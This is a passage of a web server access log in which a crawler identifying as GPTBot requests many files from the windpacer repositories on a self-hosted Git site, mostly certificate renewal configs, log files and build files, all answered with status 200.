"/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 10976] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:15:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:15:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:15:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:15:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:15:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" -[17/Feb/2026:15:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" -[17/Feb/2026:15:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpip3" [Client 74.7.227.38] [Length 24097] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10845] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:15:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10815] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:15:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12740] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2f.venv%2fbin%2fhttpx" [Client 74.7.227.38] [Length 19408] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:15:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16173] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" -[17/Feb/2026:15:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11142] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:15:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:15:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:15:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 10957] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:15:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:15:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:15:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10943] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10942] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12196] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:15:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:15:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12167] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:15:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:15:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:15:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 10986] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:15:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 10988] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:15:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12199] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 10984] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12193] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:15:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12046] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12047] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10604] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12047] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 